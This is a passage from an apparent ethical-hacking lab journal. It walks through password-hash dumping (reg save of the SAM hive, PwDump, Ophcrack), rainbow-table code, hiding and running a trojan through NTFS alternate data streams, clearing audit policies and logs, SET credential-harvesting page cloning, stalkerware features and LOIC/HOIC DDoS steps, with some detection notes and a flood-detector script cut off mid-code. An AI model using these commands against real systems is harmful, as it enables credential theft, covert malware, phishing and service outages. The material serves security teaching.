implement any type of vulnerability test.
The scanner obtains the tests for detecting vulnerabilities from a feed that has a long history and
daily updates.

OpenVAS has been developed and driven forward by the company Greenbone Networks since
2006. As part of the commercial vulnerability management product family Greenbone Enterprise
Appliance, the scanner forms the Greenbone Community Edition together with other open-
source modules.


Practical No. 4
a. Perform mobile network scanning using NESSUS
Nessus includes features for assessing mobile devices. Network-based scanning is not the right approach for them, largely because most devices are in "sleep" mode and/or attached to a 3G/4G network rather than the corporate LAN. Mobile Device Management (MDM) systems, however, keep an inventory of enrolled devices, including their OS versions and known security vulnerabilities, and Nessus queries that inventory instead of the devices themselves.
With Nessus Manager, the Nessus Mobile Devices plugin family obtains information about devices registered in a Mobile Device Manager (MDM) and from Active Directory servers that hold device information synchronised from Microsoft Exchange servers.
• To query this information, the Nessus scanner must be able to reach the Mobile Device Management servers. Ensure that no screening device blocks traffic from the Nessus scanner to these systems. In addition, you must give Nessus administrative credentials (for example, a domain administrator account) for the Active Directory servers.
• To scan for mobile devices, configure Nessus with authentication information for the management server and the mobile plugins. Since Nessus authenticates directly to the management servers, you do not need to list any target hosts in the scan policy.
• For ActiveSync scans that read data from Microsoft Exchange servers, Nessus reports on phones that have synchronised in the last 365 days.

b. Perform the System Hacking using the following tools:
i. Winrtgen
In this practical we generate rainbow tables with WinRTGen.

To generate a rainbow table we first set WinRTGen's properties to suit our needs: click "Add Table", and a new dialog named "Rainbow Table Properties" appears.

In the "Rainbow Table Properties" window we can modify the settings that determine which passwords the table covers and how large it is. The properties include:

• Hash: the hash algorithm the table is generated for, for example MD5, MD4 (the Windows NT hash is MD4 over the UTF-16LE password), SHA1, etc. A rainbow table only works for one algorithm, and only for unsalted hashes.

After assigning values to the properties, click "Benchmark". This shows the estimated hash speed, step speed and table precomputation time required to generate the rainbow table with the chosen properties.

Then click "OK"; the rainbow table is added to the queue in WinRTGen's main window.

Select the queued table you want to process and start generation; WinRTGen begins computing the chains.

After completion, the window appears as follows.


This table will be saved to your WinRTGen Directory.
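To make the rainbow-table mechanics concrete, the following Python script is an added example; it is not part of the original journal and not WinRTGen's code. It builds a tiny table for 3-character lowercase MD5 passwords from the same ingredients WinRTGen exposes as properties (hash algorithm, charset, password length, chain length and a set of chain start points), then recovers a password from its hash. The constants, the choice of start points and the reduction function are illustrative assumptions, not WinRTGen's actual algorithm.

```python
import hashlib
import itertools

# Toy rainbow table: 3-character lowercase passwords hashed with MD5.
# Same scheme WinRTGen uses, scaled down so it runs in well under a second.
CHARSET = "abcdefghijklmnopqrstuvwxyz"
PW_LEN = 3
CHAIN_LEN = 20                      # WinRTGen's "chain length"
SPACE = len(CHARSET) ** PW_LEN      # 17,576 possible passwords

# Constructed start points: the first 300 passwords in dictionary order
# (WinRTGen picks them pseudo-randomly; fixed values keep the demo reproducible).
DEMO_STARTS = ["".join(p) for p in itertools.islice(
    itertools.product(CHARSET, repeat=PW_LEN), 300)]


def md5_hex(password: str) -> str:
    return hashlib.md5(password.encode()).hexdigest()


def reduce_hash(digest_hex: str, step: int) -> str:
    """Reduction function: map a hash back into the password space.
    The step index is mixed in so every column of the table uses a different
    reduction, which stops chains from merging the moment they collide."""
    n = (int(digest_hex[:16], 16) + step) % SPACE
    chars = []
    for _ in range(PW_LEN):
        chars.append(CHARSET[n % len(CHARSET)])
        n //= len(CHARSET)
    return "".join(chars)


def build_table(start_points):
    """Precompute chains; only (end point -> start point) is stored, not the
    intermediate hashes. That is the time/memory trade-off of a rainbow table."""
    table = {}
    for start in start_points:
        pw = start
        for step in range(CHAIN_LEN):
            pw = reduce_hash(md5_hex(pw), step)
        table.setdefault(pw, start)     # a merged chain keeps the first start
    return table


def lookup(table, target_hex):
    """Try every column the target hash could sit in, run the chain to its end,
    and if that end point is in the table regenerate the chain from its start."""
    for pos in range(CHAIN_LEN - 1, -1, -1):
        pw = reduce_hash(target_hex, pos)
        for step in range(pos + 1, CHAIN_LEN):
            pw = reduce_hash(md5_hex(pw), step)
        start = table.get(pw)
        if start is None:
            continue
        cand = start
        for step in range(CHAIN_LEN):   # walk the chain and confirm the hash
            if md5_hex(cand) == target_hex:
                return cand
            cand = reduce_hash(md5_hex(cand), step)
        # end point matched but the hash was not on this chain: a false alarm
    return None


if __name__ == "__main__":
    table = build_table(DEMO_STARTS)
    print(f"{len(table)} chains stored for {len(DEMO_STARTS)} start points")
    for pw in ("aaa", reduce_hash(md5_hex("aaa"), 0), "zzz"):
        print(pw, md5_hex(pw), "->", lookup(table, md5_hex(pw)))
```

Only the chain end points are kept, so the table is far smaller than the 17,576 hashes it can cover; the price is that a lookup re-computes up to CHAIN_LEN chains. The same trade-off, with millions of chains and lengths in the thousands, is what WinRTGen's benchmark estimates. A password whose chain was dropped by a merge, or that lies outside the charset and length, is simply not found, and a salted hash defeats the whole approach because the table would have to be rebuilt per salt.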

ii. PWDump
The Security Account Manager, or SAM for short, holds all local user accounts and their passwords. Every password is hashed before being stored in the SAM. The hashes live in the registry under HKEY_LOCAL_MACHINE\SAM (open the Registry Editor and navigate there; the keys are locked to SYSTEM by default), and the backing hive file is C:\Windows\System32\config\SAM.
PwDump7 was created by Tarasco Security. It extracts the SAM hive and dumps the credentials it contains, one account per line in the form username:RID:LM-hash:NT-hash:::. It must be run from an administrative command prompt, since reading the SAM requires administrator (in practice SYSTEM) rights. After downloading it, simply enter the following line at the command prompt to use the tool:

[Link]

As a result, it prints all the hashes kept in the SAM file. Alternatively, the SAM and SYSTEM hives can be exported for offline extraction (the SYSTEM hive holds the boot key needed to decrypt the SAM) with the following commands, again from an elevated prompt:

reg save hklm\sam c:\sam

reg save hklm\system c:\system
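Once a dump is in hand, the first thing a tester does is triage it. The following Python script is an added example (not part of the original journal and not PwDump's code): it parses lines in the pwdump format described above and flags what is worth reporting before any cracking starts. The sample dump and the hash values for alice, bob and carol are constructed placeholders; the two constants for the empty-password LM and NT hashes are the real, well-known values.

```python
# pwdump output has one account per line:
#   username:RID:LM-hash:NT-hash:::
EMPTY_LM = "aad3b435b51404eeaad3b435b51404ee"   # LM hash of an empty password
EMPTY_NT = "31d6cfe0d16ae931b73c59d7e0c089c0"   # NT hash of an empty password

# Constructed sample dump (hashes for alice, bob and carol are placeholders).
SAMPLE_DUMP = """\
Administrator:500:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
alice:1001:aad3b435b51404eeaad3b435b51404ee:0123456789abcdef0123456789abcdef:::
bob:1002:0123456789abcdef0123456789abcdef:fedcba9876543210fedcba9876543210:::
carol:1003:NO PASSWORD*********************:0123456789abcdef0123456789abcdef:::
"""


def parse_pwdump_line(line: str):
    """Return {user, rid, lm, nt} or None for lines that are not account records."""
    parts = line.strip().split(":")
    if len(parts) < 4 or not parts[1].isdigit():
        return None
    return {"user": parts[0], "rid": int(parts[1]),
            "lm": parts[2].lower(), "nt": parts[3].lower()}


def has_lm_hash(lm: str) -> bool:
    """True when a real LM hash is present. Both the empty-password constant and
    the 'NO PASSWORD*' marker some dumpers print mean LM storage was disabled."""
    return not (lm == EMPTY_LM or lm.startswith("no password"))


def triage(lines):
    """Flag the findings a tester reports first: blank passwords, LM hashes
    (DES-based, case-insensitive, crackable in minutes with rainbow tables),
    the built-in Administrator account, and NT hashes shared between accounts."""
    records = [r for r in (parse_pwdump_line(l) for l in lines) if r]
    users_by_nt = {}
    for r in records:
        if r["nt"] != EMPTY_NT:
            users_by_nt.setdefault(r["nt"], []).append(r["user"])
    findings = []
    for r in records:
        issues = []
        if r["nt"] == EMPTY_NT:
            issues.append("blank password")
        if has_lm_hash(r["lm"]):
            issues.append("LM hash stored (legacy, trivially crackable)")
        if r["rid"] == 500:
            issues.append("built-in Administrator (RID 500)")
        others = [u for u in users_by_nt.get(r["nt"], []) if u != r["user"]]
        if others:
            issues.append("same password as " + ", ".join(others))
        findings.append((r["user"], issues))
    return findings


if __name__ == "__main__":
    for user, issues in triage(SAMPLE_DUMP.splitlines()):
        print(f"{user:15s} {'; '.join(issues) or 'nothing notable'}")
```

Shared NT hashes are worth flagging because NT hashes are unsalted: two accounts with the same password have identical hashes, so cracking one (or passing the hash) gives both.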

iii. Ophcrack
When it comes to free Windows password crackers, users usually opt for Ophcrack as it is free
and easily available.
Step 1: Since we are assuming that your Windows PC is locked and you do not know the
password, the first step needs to be carried out on a different PC with internet access and
administrator privileges.
Step 2 : Download the correct version of Ophcrack Live CD from the official website to the
second PC.
Step 3 : Burn the ISO file to a USB or CD. To do this, you will need an ISO burning
application. Now proceed to the next step of the password reset process.
Step 4 : Remove the bootable media from the second PC and insert it into your locked
Windows machine. Let the computer boot up from this media instead of the native Windows
installation. This is made possible by the fact that Ophcrack itself contains a small operating
system that can run independently of your Windows OS. In a few moments, you will see the
Ophcrack interface on your computer.
Step 5 : You will now see a menu with 4 options. Leave it on the default option, which is automatic. After a few seconds the Ophcrack Live CD loads and displays the disk partition information as Ophcrack identifies the partition holding the SAM file.
Step 6 : Once the process has completed, a window lists the user accounts with their recovered passwords in column format. Against the previously locked username, look for an entry in the NT Pwd column (the LM Pwd columns are only populated when the old LM hash is still stored). If the password lies outside the coverage of the loaded rainbow tables, for example longer than the free tables handle or using characters they do not cover, the column stays empty and a larger table or a dictionary attack is needed.
Step 7: The entry is the recovered password, so note it down. You can now remove the Live CD from the drive and restart the computer; you will be able to log in to the user account with the password Ophcrack recovered.

iv. Flexispy

FlexiSPY is a commercial phone-monitoring application for Android and iOS whose features include a keylogger. It is routinely listed among the most capable spy-phone applications and offers the full set of functions expected of a monitoring system.

It records phone calls, captures SMS and WhatsApp messages, captures keystrokes, and lets the operator read e-mail and Facebook messages.

The app also tracks the device's location and, from the operator's web dashboard, can switch on the microphone remotely and record conversations without the owner noticing. Installing it requires physical access to the unlocked device, and many of the interception features only work on a rooted (Android) or jailbroken (iOS) device; from a defender's point of view it is stalkerware, and an unexplained rooted device is the first indicator to look for.

v. NTFS Stream Manipulation


NTFS stores each file as a set of attributes. The file's contents live in an unnamed $DATA attribute (the main data stream), while items such as the security descriptor (permissions) and the standard timestamps are separate attributes. NTFS also allows a file to carry additional, named $DATA attributes: these are alternate data streams (ADS).

An ADS is specific to NTFS (it is lost when the file is copied to a FAT volume or attached to an e-mail) and holds data that is associated with a file but not part of its visible content. Windows itself uses ADSs for metadata: the best-known example is the Zone.Identifier stream that marks files downloaded from the Internet, and older versions stored document summary properties such as author name and word count the same way.

ADSs let data be forked into an existing file without changing its visible content, its reported size, or how it appears in Explorer and in a plain dir listing. An attacker can use this to inject a malicious executable into a file on a compromised system and run it without the user noticing; rootkits and hacker tools are hidden this way so that the administrator does not see them in a normal directory listing.

Attaching an ADS does not change the reported size of the host file, but it does update the file's modification timestamp, and the streams themselves are easy to list once you know to look: dir /R shows every stream with its size, and PowerShell's Get-Item -Path <file> -Stream * does the same.

Creation of NTFS streams:

When a user reads or writes a file, only the main (unnamed) data stream is touched by default. An alternate stream is addressed by appending a colon and the stream name to the file name:

[Link]:alternativeName

Open a Command Prompt and type the following command to create a file named file_1.txt:

echo "this is file no 1" > file_1.txt

Now type the following command to write to a stream named [Link] attached to file_1.txt:

echo "this is a hidden file inside the file_1.txt" > file_1.txt:[Link]

We have just created a stream named [Link] that is associated with file_1.txt. Reading file_1.txt shows only the original text, and the stream does not appear in a plain directory listing (it does appear in dir /R).

The following command can be used to view or modify the stream hidden in file_1.txt:

notepad file_1.txt:[Link]

Note: Notepad is a stream-compliant application. Never use alternative streams to store sensitive
information.

Hiding [Link] in [Link] file stream:

The following command copies [Link] into a stream named [Link] attached to [Link]:

C:\test>type [Link] > [Link]:[Link]

Here the type command is used to hide the trojan in an ADS inside an existing file.

After hiding [Link] behind [Link], we need a way to launch the executable from the stream, since an ADS cannot be started by double-clicking the host file. The following command creates a symbolic link that points at the stream (mklink needs an elevated Command Prompt):

C:\test>mklink [Link] [Link]:[Link]

Running [Link] now executes the trojan hidden behind [Link]; [Link] is only the shortcut that launches it. Note that streams are hidden from casual inspection, not from security tooling: dir /R lists them and endpoint scanners can inspect them.

vi. ADS Spy
ADS Spy is a small free Windows utility, written by Merijn Bellekom (the author of HijackThis), that scans NTFS volumes for alternate data streams and can delete the ones it finds. It simply enumerates the named streams attached to each file, which is enough to expose a hidden executable such as the one created in the previous section. Open ADS Spy and choose the scope of the scan:
• Quick scan (Windows base folder only)
• Full scan (all NTFS drives)
• Scan only this folder

Since the file was stored in the Documents folder, select the "Scan only this folder" option and point it at Documents.

Click "Scan the system for ADS". Every stream found is listed with its host file; tick the entries you want to get rid of and use the Remove button to delete them. Some streams are legitimate, for example the Zone.Identifier stream Windows attaches to downloaded files, so review the list before removing anything.


As shown in the figure below, ADS Spy has detected the [Link]:[Link] file from the
directory.

vii. Snow
Create a text file with some data in the same directory where Snow Tool is installed.

Go to the Command Prompt and change to the directory containing the Snow tool.

Type the command:

snow -C -m "text to be hidden" -p "password" <sourcefile> <destinationfile>

Here -C compresses the message before hiding it, -m gives the message and -p sets the password used to encrypt it. The source file is a plain [Link] text file as shown above. The destination file is a copy of the source whose visible text is unchanged but whose line endings now carry the hidden data as trailing spaces and tabs.

Go to the directory; you will see a new file [Link]. Open the file.

The new file shows the same text as the original, with nothing visibly different; the only change is invisible whitespace at the ends of lines. This file can be sent to the target.
Recovering Hidden Information
At the destination, the receiver reveals the information with the command (the password must match the one used when hiding):
snow -C -p "password123" [Link]


As shown in the figure above, the hidden message is recovered from the file (decrypted with the password and decompressed) and displayed.
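To show what "hiding data in the whitespace" actually means, the following Python script is an added example; it is not part of the original journal and not Snow's code. It implements a simplified whitespace scheme (one hidden byte per line, space for 0 and tab for 1) rather than Snow's real packing, and it does neither the compression of -C nor the encryption of -p, so the hidden text is readable by anyone who knows the trick; the cover text in the demo is constructed.

```python
def _bits(byte: int):
    return [(byte >> i) & 1 for i in range(7, -1, -1)]


def capacity(cover: str) -> int:
    """Bytes that can be hidden: one per line with this packing."""
    return len(cover.split("\n"))


def hide(cover: str, message: str) -> str:
    """Append one hidden byte per line as 8 trailing whitespace characters:
    a space encodes 0, a tab encodes 1. Visible text is left exactly as it was."""
    lines = cover.split("\n")
    payload = message.encode("utf-8")
    if len(payload) > len(lines):
        raise ValueError(f"cover has {len(lines)} lines, message needs {len(payload)}")
    out = []
    for i, line in enumerate(lines):
        line = line.rstrip(" \t")   # existing trailing blanks would corrupt the decode
        if i < len(payload):
            line += "".join("\t" if b else " " for b in _bits(payload[i]))
        out.append(line)
    return "\n".join(out)


def reveal(stego: str) -> str:
    """Read the trailing whitespace of each line back into bytes; the first line
    carrying fewer than 8 trailing blanks marks the end of the message."""
    data = bytearray()
    for line in stego.split("\n"):
        tail = line[len(line.rstrip(" \t")):]
        if len(tail) < 8:
            break
        value = 0
        for ch in tail[-8:]:
            value = (value << 1) | (1 if ch == "\t" else 0)
        data.append(value)
    return data.decode("utf-8")


if __name__ == "__main__":
    cover = "Dear colleague,\nplease find the minutes attached.\nRegards,\nA\n"
    stego = hide(cover, "hi!")
    print(repr(stego))          # the \t and trailing spaces are the payload
    print(reveal(stego))
```

Two practical points follow from the code. The carrier only survives if nothing normalises whitespace on the way; an editor that strips trailing blanks, or a mail gateway that re-wraps text, destroys the message, which is a real limitation of Snow as well. And the hidden bytes are trivially detectable: a line that ends in exactly eight spaces and tabs is a signature, which is why Snow's -p encryption hides the content but not the fact that something is hidden.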

viii. Quickstego
Image Steganography using QuickStego
1. Open QuickStego Application

2. Upload an image. This image is termed the cover, as it will hide the text.

3. Enter the Text or Upload Text File

4. Click Hide Text Button

5. Save Image
This Saved Image containing Hidden information is termed as Stego Object.

Recovering Data from Image Steganography using QuickStego


1. Open QuickStego
2. Click Get Text


3. Open and compare both images.

Left image: the cover without hidden text; right image: the stego object with hidden text. To the eye they are identical, because the changes the tool makes to the pixel values are far too small to notice.
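The following Python script is an added example of least-significant-bit (LSB) image steganography, the classic technique behind tools of this kind; it is not part of the original journal and it is not QuickStego's code, whose exact embedding method the page does not describe. It works on a constructed array of 8-bit greyscale pixel bytes rather than an image file, so it runs without an image library; with a real picture you would load it with Pillow and feed the channel bytes to the same functions.

```python
import struct


def _bits(data: bytes):
    for byte in data:
        for i in range(7, -1, -1):
            yield (byte >> i) & 1


def embed(pixels: bytes, message: str) -> bytes:
    """Write the message into the least significant bit of successive pixel bytes.
    A 4-byte big-endian length prefix lets the extractor know where to stop."""
    payload = message.encode("utf-8")
    frame = struct.pack(">I", len(payload)) + payload
    if len(frame) * 8 > len(pixels):
        raise ValueError("cover image too small for this message")
    out = bytearray(pixels)
    for i, bit in enumerate(_bits(frame)):
        out[i] = (out[i] & 0xFE) | bit      # only the lowest bit changes
    return bytes(out)


def _read_bytes(pixels: bytes, offset: int, count: int) -> bytes:
    buf = bytearray()
    for j in range(count):
        v = 0
        for k in range(8):
            v = (v << 1) | (pixels[offset + j * 8 + k] & 1)
        buf.append(v)
    return bytes(buf)


def extract(pixels: bytes) -> str:
    """Reverse of embed: read the length prefix, then that many bytes."""
    (length,) = struct.unpack(">I", _read_bytes(pixels, 0, 4))
    if 32 + length * 8 > len(pixels):
        raise ValueError("no valid LSB payload in this cover")
    return _read_bytes(pixels, 32, length).decode("utf-8")


def changed_pixels(a: bytes, b: bytes) -> int:
    return sum(x != y for x, y in zip(a, b))


# Constructed cover: a 64x64 8-bit greyscale gradient (assumed sample data).
COVER = bytes((x * 7 + 13) % 256 for x in range(64 * 64))

if __name__ == "__main__":
    stego = embed(COVER, "Stego object")
    print(extract(stego), "-", changed_pixels(COVER, stego), "pixels changed")
```

Each embedded bit alters one pixel by at most one intensity level, which is why the two images look the same. The weakness is equally visible in the code: the payload sits in a fixed place with a fixed layout, so anyone who suspects LSB embedding can run extract on the file. Lossy re-encoding (saving the stego object as JPEG) also destroys the low bits, so tools of this kind rely on lossless formats such as BMP or PNG.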

ix. Clearing Audit Policies


Enabling and Clearing Audit Policies
To list the command's options, enter:
C:\Windows\system32>auditpol /?

Enter the following command to enable success and failure auditing for the System and Account Logon categories:
C:\Windows\system32>auditpol /set /category:"System","Account Logon" /success:enable /failure:enable

To check that auditing is enabled, enter:

C:\Windows\system32>auditpol /get /category:"Account Logon","System"

To clear the audit policy, enter the following command:

C:\Windows\system32>auditpol /clear
Are you sure (Press N to cancel or any other key to continue)?Y

auditpol /clear requires administrative rights and resets every category to No Auditing. Attackers run it so that the system stops recording their activity; on a monitored host the change itself generates Security event 4719 (system audit policy was changed), which is worth alerting on, as is event 1102 (the audit log was cleared).

To confirm that auditing is now disabled, enter the command:

C:\Windows\system32>auditpol /get /category:"Account Logon","System"


x. Clearing Logs
1. Open a terminal on the Kali Linux machine.

2. Change to the /var directory.

3. Open the log folder, /var/log, where the system and service logs are kept.

4. Select any log file.

5. Open the file; as root you can edit or delete its contents.

Clearing logs is itself evidence: the file's timestamps change, journald and login records often survive, and a central log server that receives copies over syslog keeps what the attacker deleted locally. That forwarding is the standard countermeasure.


Practical No. 5
a. Use wireshark to sniff the network.
Wireshark is a GUI-based packet capture program; as noted, it ships with command-line companions (tshark and dumpcap). Its main advantage is that it lets us browse the whole capture easily, moving around the packets and expanding any layer of each one. Because it captures at the link layer, every record carries the full network stack from the Ethernet header up, which technically makes what we have captured frames rather than packets.
• Start Wireshark. Under the “Capture” header, select the “Interface List” option; or
click on the “Interfaces” button on the toolbar:
This will bring up a list of network interfaces that Wireshark is able to capture
packets from:

List of available capture interfaces


Select the network adapter (wired or wireless) that you are currently using to connect to
the Internet, and hit the “Start” button. This will take you to the main window:

Wireshark is now capturing live network activity on your network interface. Notice that
the list of packets is color-coded to highlight different types of network traffic.
 Open your web browser and navigate to a few random web pages - observe that
the network packets corresponding to your web browsing activity are captured and
show up in Wireshark as well.
 By default, the list of captured packets will keep scrolling automatically during
a live capture. You can toggle this on/off using the AutoScroll toggle button in
the toolbar.

 After letting the capture run for a couple of minutes, press the stop capture
button. Do not close this capture session.
Filtering the Packet List
Capturing network traffic for a couple of minutes will include traffic on many different protocols such as ARP, TCP, UDP, DNS and HTTP.

We may not be interested in all of these, depending on what we are trying to achieve.
Fortunately, Wireshark allows us to filter the list based on different criteria using the
“Filter” toolbar:

Filter toolbar
Let us take a look at the HTTP traffic that occurs when we browse the web.
In the filter toolbar, type “http” and then click on “Apply”. The window will
now list only captured packets related to HTTP traffic:

Examining HTTP Traffic
Next, look at the HTTP traffic exchanged during web browsing.
• Stop and close any capture that you may have open, and start a new capture.
• Set the filter to show only HTTP traffic.
Note that the http display filter only matches cleartext HTTP. A site served over HTTPS appears as TLS and its request and response headers are not readable, so use a page served over plain HTTP for this exercise.
Start with the HTTP request sent from your web browser.
• In your web browser, navigate to some webpage like
[Link]
• In the top frame of the Wireshark main window, look for the packet that
corresponds to your request. This contains the URL in the “Info” section. Select
this packet.
• In the middle frame of the Wireshark window, expand the “Hypertext Transfer
Protocol” section. Notice the details given for the:
o GET request
o Host
o User-Agent
o Accept
o Cookie
o etc.

Take a look at the HTTP response to the above request.

In the top frame of the Wireshark main window, find and select the “HTTP/1.1 200 OK”
packet immediately below the request for [Link]. This is the response containing the
requested web page.

Again, expand the “Hypertext Transfer Protocol” section. Notice the details given for
o Cache-Control
o Content-Type
o Server
o Etc

Details of incoming HTTP response corresponding to [Link]

b. Use SMAC for MAC Spoofing.


SMAC is a MAC address changer that has a simple-to-use graphical interface that enables the
less experienced user all the way up to the guru to change a piece of hardware’s MAC address.
The less experienced user will appreciate the random generator whereas the guru will appreciate
the ability to hand enter a new MAC address.

Once it is installed, you will find the application launcher in a Start Menu subdirectory called
KLC. Click on that folder and you will see SMAC 2.0. Click on that launcher and the SMAC
main window (Figure A) will open.

Using SMAC can be very simple, depending on how you want to use it. The simplest way to use
SMAC is to assign a random MAC address to a piece of hardware. Before we actually assign a
new address, let’s take a look at the other hardware on the machine. In the main window there is
a check box that tells SMAC to show only active hardware. This checkbox is checked by default.
Uncheck that box and your listing will grow, depending on the hardware on your machine. Take
a look at Figure B to see how much the listing grows on my laptop that includes wireless, wired,
and dial-up connections.

Figure A

Figure B

When you click on a different listing, the information about that hardware will be
displayed below.

Let's change the MAC address of the wired Marvell Yukon PCI-E Fast Ethernet Controller. To do this, select that entry from the list and click the Random button. As you can see in Figure C, the new, random MAC address is displayed in the New Spoofed MAC Address section.

Figure C

The address generated starts with the OUI (the first three bytes, which identify the manufacturer) of the vendor currently selected in the manufacturer list.

If you want to spoof your MAC address to that of a specific manufacturer, select a different manufacturer from the drop-down list; the generated address changes accordingly. You can keep hitting Random until you get an address you like, or just take the first random address you get.

Once you have your address, select the Options menu and make sure Automatically Restart Adapter is checked. Then hit the Update MAC Address button and the new MAC address is applied. SMAC writes the address to the adapter's NetworkAddress value in the registry, and the driver picks it up when the adapter restarts; the change therefore survives reboots until it is removed. Some drivers, notably many Wi-Fi adapters, only accept an address whose first octet has the locally-administered bit set (for example one starting 02:). Verify the result with ipconfig /all or getmac.

c. Use Capsa Network Analyser.


Once Capsa is installed, you will want to start your first capture right away. The Capsa 7 Start Page guides you through setting up an accurate capture step by step:


1. Double-click the Capsa icon on the desktop.


2. In the Start Page, select your NICs (multiple selections available) in the Capture panel
first.

3. Select any Network Profile in the Network Profile panel.

4. Select Full Analysis in the Analysis Profile panel.


5. Click the big Run button to start a capture right away.

This is the common procedure to start a capture, which helps us get accurate and useful analysis
data: Select NIC -> Select Network Profile -> Select Analysis Profile -> Run.

d. Use Omnipeek Network Analyzer.


Omnipeek is a high-performance network protocol analyzer, capable of decoding thousands of
protocols for fast network troubleshooting and diagnostics, anywhere network issues happen.

Real-Time Network Protocol Analyzer

Omnipeek provides real-time analysis for every type of network segment – 1/10/40/100 Gigabit,
802.11, and voice and video over IP – and for every level of network traffic.

Intuitive Graphic Displays and Visualization
Omnipeek delivers intuitive visualization and effective forensics for faster resolution of network
and application performance issues and security investigations.

Best-In-Class Network Analysis Workflow


Omnipeek's analysis workflow makes it easy to drill down from a high-level view to a single packet, all from a single pane of glass.

WiFi Troubleshooting
The Omnipeek WiFi adaptor is a USB-connected WLAN device designed for wireless packet
capture. The 802.11ac adapter supports 802.11ac capture up to 2 transmit/receive streams
(866Mbps wireless traffic) and supports 20MHz, 40MHz, and 80MHz channel operation.


Monitor Distributed Networks Remotely

Integrating with LiveCapture, Omnipeek extends network monitoring and visibility for
troubleshooting application-level issues at remote sites and branches, WAN links, and data
centers.

Voice and Video Monitoring and Troubleshooting

Monitor and troubleshoot voice and video over IP traffic in real-time with high-level multi-
media summary statistics, call playback, and comprehensive signaling and media analyses.


Simplify Troubleshooting Remote Devices

Easily troubleshoot end-user devices remotely and securely with encrypted files, avoiding the
need to travel to a user’s location.


Practical No. 6
a. Use the Social Engineering Toolkit (SET) on Kali Linux to perform social engineering.
We use SET to clone a login page and send the cloned link to a victim. When the victim logs in through the link, the submitted credentials are displayed in the Kali Linux terminal.

Procedure:
1. Open Kali Linux

2. Go to Application


3. Click Social Engineering Tools


4. Click Social Engineering Toolkit

5. Enter “Y” to proceed.


6. Type “1” for Social Engineering Attacks

7. Type “2” for website attack vector


8. Type “3” for Credentials harvester attack method

9. Type “2” for Site Cloner


10. Type IP address of Kali Linux machine ( [Link] in our case).

11. Type target URL


12. The cloned page is now served from [Link]. The address can be used directly, but that is not effective in a real scenario: it is normally disguised behind a plausible-looking URL and delivered to the victim. Because the page is a clone, the user cannot tell it from the real site unless he inspects the URL. If he clicks and attempts to log in, the credentials are sent to the Kali terminal. In the figure below, we use [Link] to proceed.

13. Login using username and Password


Username: admin
Password: Admin@123

14. Go back to the Kali terminal and observe.

The POST parameters of the login form are printed, including the username admin and the password exactly as the victim typed them. After submitting, the victim sees a page redirect to the legitimate site, where he can log in again and browse normally, so nothing looks wrong from his side.

b. Perform the DDOS attack using the following tools:


i. HOIC
High Orbit Ion Cannon (HOIC) is a free, open-source network stress application developed by
Anonymous, a hacktivist collective, to replace the Low Orbit Ion Cannon (LOIC). Used
for denial of service (DoS) and distributed denial of service (DDoS) attacks, it functions by
flooding target systems with junk HTTP GET and POST requests.
Widespread HOIC availability means that users having limited knowledge and experience can
execute potentially significant DDoS attacks. The application can open up to 256 simultaneous
attack sessions at once, bringing down a target system by sending a continuous stream of junk
traffic until legitimate requests are no longer able to be processed.


ii. LOIC

LOIC was originally developed by Praetox Technologies as a stress-testing application before being released into the public domain. The tool performs a simple DoS attack by sending a large number of UDP, TCP or HTTP requests to the target server. It is very easy to use, even by those without any knowledge of hacking: the only thing a user needs is the URL or IP address of the target. A would-be attacker then selects a few options (target address and attack method) and clicks a button to start the attack.

The tool takes the URL of the target server on which you want to perform the attack. You can
also enter the IP address of the target system. The IP address of the target is used in place of an
internal local network where DNS is not being used. The tool has three chief methods of attack:
TCP, UDP and HTTP. You can select the method of attack on the target server. Some other
options include timeout, TCP/UDP message, Port and threads. See the basic screen of the tool in
the snapshot above in Figure.

• Step 1: Run the tool.

• Step 2: Enter the URL of the website in the URL field and click Lock On. Then select the attack method (TCP, UDP or HTTP); TCP is a reasonable one to start with. These two settings are all that is needed to start the attack.

Figure 3: LOIC in action (the URL and IP were painted over to hide the identity of the target).

• Step 3: Change the other parameters as you wish or leave them at the defaults. Now click the big button labelled "IMMA CHARGIN MAH LAZER". You have just mounted an attack on the target.

After starting the attack you will see counters in the Attack status fields. When the Requested counter stops increasing, restart LOIC or change the IP. You can also try the UDP method. The slider sets the speed of the attack; it defaults to the fastest setting and is rarely turned down. Note that LOIC makes no attempt to hide its source: every request carries the attacker's real IP address, which is how participants in past LOIC campaigns were identified.

iii. HULK
HULK is an abbreviation for HTTP Unbearable Load King, which is a web server Distributed Denial of
Service tool. It is mainly designed for research purpose, and helps pen testers check the efficiency of a
server. With its help, security specialists can find loopholes in their security implementation against
DDoS, and correct them before an actual threat actor exploits it.

HULK begins each flooding connection with a normal TCP three-way handshake: the SYN is sent first, the SYN/ACK comes back, and the ACK follows.

Once the connection is established, it sends a stream of HTTP GET requests to the target URL, each carrying a different randomized query-string suffix (and randomized User-Agent and Referer headers) so that caches are bypassed and every request reaches the application.

In the capture, the host sends many HTTP GET requests with different randomized suffixes and receives a 200 (OK) response to each one.
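The random suffixes and rotating User-Agents that make HULK (and HOIC's booster scripts) effective are also what give it away in the web server's logs. The following Python script is an added example (not part of the original journal and not any of these tools' code) of the detection logic: it parses combined-format log lines and flags sources with many requests whose query strings are almost all distinct or whose User-Agent keeps changing. The log lines are constructed; the suffixes are derived from sha1 only so that the sample is reproducible, and the thresholds are assumptions to tune per site.

```python
import hashlib
import re
from collections import defaultdict

# Apache/nginx "combined" log line:
#   ip - - [time] "METHOD target proto" status bytes "referer" "agent"
LOG_RE = re.compile(
    r'^(\S+) \S+ \S+ \[([^\]]+)\] "(\S+) (\S+) [^"]*" (\d{3}) \S+ "[^"]*" "([^"]*)"')


def parse_line(line: str):
    m = LOG_RE.match(line)
    if not m:
        return None
    ip, ts, method, target, status, agent = m.groups()
    return {"ip": ip, "ts": ts, "method": method, "target": target,
            "status": int(status), "agent": agent}


def flood_sources(lines, min_requests=50, distinct_ratio=0.8, min_agents=5):
    """Return {ip: [reasons]} for sources whose traffic looks like an HTTP flood:
    many requests whose query strings are almost all different (cache-busting
    suffixes) and/or that rotate through many User-Agent strings."""
    stats = defaultdict(lambda: {"n": 0, "queries": set(), "agents": set()})
    for line in lines:
        rec = parse_line(line)
        if rec is None:
            continue
        s = stats[rec["ip"]]
        s["n"] += 1
        s["queries"].add(rec["target"].partition("?")[2])
        s["agents"].add(rec["agent"])
    flagged = {}
    for ip, s in stats.items():
        if s["n"] < min_requests:
            continue
        reasons = []
        ratio = len(s["queries"]) / s["n"]
        if ratio >= distinct_ratio:
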